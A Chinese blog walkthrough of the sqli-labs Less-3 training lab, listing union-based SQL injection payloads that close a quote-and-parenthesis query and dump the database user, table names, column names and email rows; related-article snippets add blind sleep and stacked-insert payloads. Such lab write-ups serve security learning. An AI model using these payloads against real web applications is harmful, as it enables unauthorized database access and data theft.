Sqli-labs Less-3 Error Based- String (with Twist)

最新推荐文章于 2022-06-10 16:14:55 发布
最新推荐文章于 2022-06-10 16:14:55 发布
阅读量276 收藏
点赞数 1
分类专栏: sql注入学习 文章标签: mysql sql 信息安全 网络安全 数据安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25500649/article/details/115715518
版权

首先还是看网页提示输入id测试,输入id后加单引号看有什么输出。

payload
/sql/Less-3/?id=1'

可以看到报错,报错在1后面有一个括号,换一个payload试一下。

payload
/sql/Less-3/?id=1') --+

可以看到可以正常显示内容。

接下来确定回显位置。

/sql/Less-3/?id=-1') union select 1,2,3--+

可以看到回显位置为2和3的位置,这里要注意id要设置为-1才能够看到回显位置,因为id为-1在数据库中没有对应的数据。

接下来爆数据库的用户与库名。

/sql/Less-3/?id=-1') union select 1,user(),database() --+

接下来就可以爆数据库下面的的表名称了。

/sql/Less-3/?id=-1') union select 1,(select table_name from information_schema.tables where table_schema='security' limit 0,1),database() --+

可以看到在security中有一个叫做emails的表。

修改limit的参数可以查看security库中的其他的表名。

接下来查询emails表的表结构,也就是查询表的字段名称。

/sql/Less-3/?id=-1') union select 1,(select column_name from information_schema.columns where table_name='emails' limit 0,1),database() --+

 

可以看到emails表的第一个字段是id,修改limit的参数值可以查询后面的字段。

接下来查看emails表中emails_id的内容。

/sql/Less-3/?id=-1') union select 1,(select email_id from security.emails limit 1,1),database() --+

表内容就这样出来了,接下来就可以写脚本将所有的表内容都搞到本地来。

Ushernrt
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-lab笔记--less01 (Error Based- String
TYW168168的博客
10-17 391
      sqli-lab less01--Error Based- String(基于字符串错误)  (第1节:基于错误 – 字符串)   字符型注入,也即是通过Get或者Post方式传进去的数据被单引号或者双引号包裹住   TEST   http://127.0.0.1/sqli/Less-1/?id=1'   提示语法错误:           ...
(手工)【sqli-labs40、41】堆叠注入、盲注
07-15 1599
【SQL-堆叠、盲注】
【SQLI-Lab】-Less11-20
xinyue9966的博客
01-31 220
Basic Challenges前言Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)Less-12 POST - Error Based - Double quotes- String-with twist (基于错误的双引号POST型字符型变形的注入)Less-13 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)Less-
sqli-labs练习(一)-------GET-Error based-Single quotes-String
wkend的博客
04-15 732
关于sqli-labs环境的搭建在这里不讲了,网上有很多, 初始页面 判断是否存在sql注入, 输入1,成功返回了结果 输入1',报错 输入1' and 1=1%23,返回成功, 输入1' and 1=2%23,没有返回结果 此外,除了and,还有or,+,-等,不过要注意的一点是+号在url表示为%2b,-号不用表示 根据以上结果,我们就可以判定这是字符型sq...
sqli-labs】 less44 POST -Error based -String -Stacked Blind(POST型基于盲注的堆叠字符型注入)...
ajxi63204的博客
01-31 171
盲注漏洞,登陆失败和注入失败显示的同一个页面 可以用sleep函数通过延时判断是否闭合引号成功 这个方法有一点不好的地方在于,并不能去控制延时,延时的时间取决于users表中的数据数量和sleep函数的参数 login_user=1&login_password=1' or sleep(0.1)# 14条数据延时了1.4s 但延时的出现就证明引...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
最新发布
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
sqli-labs配置数据库sqli-labs的数据库文件
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
sqli-labs练习(十七)--- POST-Update Query-Error Based-String
wkend的博客
07-28 454
在用万能密码进行登录的时候发现,username处无法绕过对密码的检查,总是登录失败。猜测后台对uname参数的值有过滤。导致无法注入。 使用正常方式进行登录,发现在前台可以修改用户的密码。 再次尝试,发现passwd出存在sql注入漏洞, payload:uname=admin&passwd=123'&submit=Submit,出现报错语句 于是在passwd出...
sqli-labs】 less17 POST - Update Query- Error Based - String (基于错误的更新查询POST注入)...
ajxi63204的博客
01-24 273
这是一个重置密码界面,查看源码可以看到username作了防注入处理 逻辑是先通过用户名查出数据,在进行密码的update操作 所以要先知道用户名,实际情况中可以注册用户然后实行攻击,这里先用admin演示 这和前几个less都不一样,并不能 通过union select进行查询其他数据,但是由于update语句的出错信息没有被屏蔽,所以可以基于错误进行注入。 收集了...
sqli-labs Less-17 Update Query-Error Based-String
bigblue00的博客
08-25 223
标题基于错误_POST_更新查询注入 这关模拟的场景是登录后在修改密码界面注入。 1、注入点分析: 第一步测试uname=1&passwd=1时,没有登录失败提示信息,只有下图的显示。 接着尝试uname=1&passwd=1’和uname=1&passwd=1",还是什么都没有发生。 这关的提示是更改密码,后台的Mysql语句应该会用到update,查看看源码: 可以看出:用户输入uname和passwd后,首先根据uname来进行查询数据库的username和password
Error-based
weixin_33882443的博客
07-13 375
1.将聚合函数count()和group by语句联合起来迫使sql查询语句返回错误(主键重复)   须知:     floor:函数只返回整数部分,小数部分舍弃。     round:函数四舍五入,大于0.5的部分进位,不到则舍弃。     floor(rand(0)*2)前面产生的随机数是确定的011011...     1>mysql在遇到select count(*) f...
sqlilabs Less-3 GET-Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)_小白鼠日常
captainLink的博客
06-10 226
sqlilabs-less3通关(小白鼠日常)
sqli-labs练习(十二)--- POST-Error Based-Double quotes-String-with twist
wkend的博客
07-25 307
通过万能密码发现是双引号的变形, 这里直接上payload,就不再讲测试的过程了, 爆数据库名和版本 uname=123") union select database(),version()#&passwd=Dumb&submit=Submit 其余操作请参考前面几关,大同小异。...
sqli-labs less 11 POST -Error Based - Single quotes -String
Monster1m的博客
01-19 195
一、这一关开始是post型注入,选择用burp suite代理,开启拦截(intercept is on) 二、打开第11关,用bp拦截的话要把url的127.0.0.1改为本机的ip,要不然bp检测不到 三、提交表单发现页面开始转圈圈等待,bp也拦截到了报文 四、点击action,选择send to repeater,然后打开repeater模块 五、开始注入,在uname=后加1’,然后点击go,在右面的response查看返回的界面,发现界面有显示数据库错误信息 六、证明有注入点后,判断闭
sqli-labs】 less45 POST -Error based -String -Stacked Blind(POST型基于盲注的堆叠字符型注入)...
ajxi63204的博客
01-31 119
和Less44一个名字 测试一下,发现是')闭合的 login_user=1&login_password=1') or sleep(0.1)# 那就是没有错误显示的less42 login_user=1&login_password=1');insert into users(id,username,password) value(15,'r...
sqli-labs less 17 POST -Update Query- Error Based -String
Monster1m的博客
01-21 153
一、这一把好像直接看不出什么,就来分析源码吧 1.找到下面两行,发现uname在赋值时使用了一个check_input函数,先来找到这个函数是干什么的 2.找到check_input函数,发现是使用了一些函数对输入的值进行检查。所以现在uname被进行了过滤,但是发现passwd没有使用check-input进行检查,所以重点放在passwd上 3.然后找到两句数据库语句,发现update语句里有用到passwd,并且是单引号闭合,至此找到了注入点。但是由于先用uname进行了select查询,所以我们
sqli-labs less
07-28
- *1* *2* *3* [sqli-labs教程——Less 1-10](https://blog.csdn.net/qq_25649867/article/details/111020393)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值